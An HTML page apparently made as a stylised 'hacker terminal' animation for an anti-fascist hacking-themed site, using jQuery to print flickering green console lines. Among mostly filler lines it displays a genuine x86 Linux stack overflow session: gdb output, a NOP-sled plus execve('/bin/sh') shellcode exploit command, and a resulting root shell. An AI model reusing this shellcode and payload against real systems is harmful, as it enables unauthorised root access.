<!DOCTYPE html>
<html lang="en" >
<head>
  <meta charset="UTF-8">
  <title>hackihacki</title>

  <!--link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css"-->


      <!--link rel="stylesheet" href="css/style.css"-->

  <style>
  @font-face {
font-family: "Monaco";
src: url("./monaco.ttf"); 
}
  body {
	font-family: "Monaco", sans-serif;
	background: #333;
  overflow: hidden;
}

h1,
h2, p {
	color: #0f0;
	margin: 5px;
  animation: flicker 3s infinite;
	/*animation: flicker 1s linear 1s 1 normal;*/
	animation-fill-mode: forwards; /* when animation is done, apply opacity 1 */
}

h1, h2 {
	opacity: 0;
}

h1 {
	font-size: 15px;
}

h2 {
	animation-delay: 0.5s;
	font-size: 13px;
}

p {
	width: 100%;
	/*height: 30px;*/
	font-size: 12px;
	white-space: nowrap;
	overflow: hidden;
	margin-bottom: 0;
	margin-top: 0;
	animation: typing 1s steps(60, end);
}

@keyframes typing {
	0% {
		width: 0;
	}

	50% {
		width: 0;
	}

	100% {
		width: 100;
	}
}

@-webkit-keyframes typing {
	0% {
		width: 0;
	}

	50% {
		width: 0;
	}

	100% {
		width: 100;
	}
}

@keyframes flicker {
	0% {	opacity: 0;}

	10% { opacity: 1;}

	20% { opacity: 0;}

	30% { opacity: 1;}

	40% { opacity: 0;}

	50% { opacity: 1; }

	60% { opacity: 0; }

	70% { opacity: 1;}

	80% { opacity: 0;}

	90% { opacity: 1;}

	100% {opacity: 1;}
}

@-webkit-keyframes flicker {
	0% {
		opacity: 0;
	}

	10% {
		opacity: 1;
	}

	20% {
		opacity: 0;
	}

	30% {
		opacity: 1;
	}

	40% {
		opacity: 0;
	}

	50% {
		opacity: 1;
	}

	60% {
		opacity: 0;
	}

	70% {
		opacity: 1;
	}

	80% {
		opacity: 0;
	}

	90% {
		opacity: 1;
	}

	100% {
		opacity: 1;
	}
}



  </style>


</head>

<body>

  <h1>hacking nationalism 1.0.1</h1>
  <h2>!!!this machine kills fascists!!!</h2>
  <p>$root@asshole: Type your secret password to enter in to the site&#8267;</p>

<script src="./js/jquery-1.7.2.js"></script>
<script type="text/javascript">

	template = `
		<p>$root@asshole: ./ clusterfuck.sh; #hihi &#8267;</p>
		<p>$root@asshole: Type your secret password to enter in to the site&#8267;</p>
		<p>*********************</p>
		<p>!! key accepted !!</p>
		<p>$root@asshole: hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack</p><p> hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack&#8267;</p>
	`;
	nextpiece = `
	<br>
	<p>$root@asshole: ./ clusterfuck.sh; #hihi &#8267;</p>
<p>$root@asshole: Type your secret password to enter in to the site&#8267;</p>
<p>*********************</p>
	`;

let arrayOfTemplates = [
  "<p>$root@asshole: ./ clusterfuck.sh; #hihi &#8267;</p>",
  "<p>$root@asshole: Type your secret password to enter in to the site&#8267;</p>",
  "<p>*********************</p>",
  "<p>!! key accepted !!</p>",
  "<p>$root@asshole: hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack&#8267;</p>",
  `<br>
	<p>$root@asshole: ./ clusterfuck.sh; #hihi &#8267;</p>
  <p>$root@asshole: Type your secret password to enter in to the site&#8267;</p>`,
  "<p>whatever</p>",
  "<p>$root@asshole: hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack&#8267;</p>",
  "<p>$root@asshole: hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hackck hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack&#8267;</p>",
  "<p>$root@asshole: hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack hack&#8267;</p>",
  "<p>vampire@linux:/home/test$ gdb -q vuln</p>",
  "<p>Reading symbols from vuln...(no debugging symbols found)...done.</p>",
  "<p>(gdb) break func</p>",
  "<p>Breakpoint 1 at 0x8048456</p>",
  "<p>(gdb) run $(python -c 'print \"A\"*116')</p>",
  "<p>Starting program: /home/test/vuln $(python -c 'print \"A\"*116')<p>",
  "<p>Breakpoint 1, 0x08048456 in func ()</p>",
  "<p>(gdb) print $ebp</p>",
  "<p>$1 = (void *) 0xffffce78</p>",
  "<p>(gdb) print $ebp - 0x6c</p>",
  "<p>$2 = (void *) 0xffffce0c</p>",
  "<p>test@linux ~ $ ./vuln $(python -c 'print \"\x90\"*40 + \"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80\" + \"A\"*47 +</p>",
  "<p>\"\x20\xce\xff\xff\"')</p>",
  "<p>Welcome ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½j</p>",
  "<p>Xï¿½Rhn/shh//biï¿½ï¿½RSï¿½ï¿½Í€AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4ï¿½ï¿½ï¿½</p>",
  "<p># whoami</p>",
  "<p>root</p>",
  "<h1>boooom!!!</h1>",
	"<p>$root@asshole: ./ clusterfuck.sh; #hihi &#8267;</p>",
	"<p>$root@asshole: Type your secret password to enter in to the site&#8267;</p>",
	"<p>*********************</p>",
	"<p>!! key accepted !!</p>"
]

  let count = 0;

  function myLoop (i) {
     setTimeout(function () {
        //console.log("append "+count);        //  your code here
        $("body").append(arrayOfTemplates[count])
        count ++;
        if (--i) {myLoop(i)}     //  decrement i and call myLoop again if i > 0
        else {
          setTimeout(function(){
            count = 0;
            myLoopPrepend(arrayOfTemplates.length)
          }, 3000)
        }
     }, 400)
  };                        //  pass the number of iterations as an argument


  function myLoopPrepend (i) {
     setTimeout(function () {
        //console.log("prepend "+count);        //  your code here
        $("body").prepend(arrayOfTemplates[count])
        count ++;
        if (--i) {myLoopPrepend(i)}     //  decrement i and call myLoop again if i > 0
        else {
          setTimeout(function(){
            count = 0;
            myLoopPrepend(arrayOfTemplates.length)
          }, 3000)
        }
     }, 600)
  };

  myLoop(arrayOfTemplates.length);

/*
	setTimeout(
		function(){
			$("body").append(template)
		},2000
		)

	setTimeout(
		function(){
			$("body").append(nextpiece)
		},4500
		)

	setTimeout(
		function(){
			$("body").append(template)
		},6000
		)

	setTimeout(
		function(){
			$("body").append(nextpiece)
		},7500
		)
*/
</script>


</body>
</html>
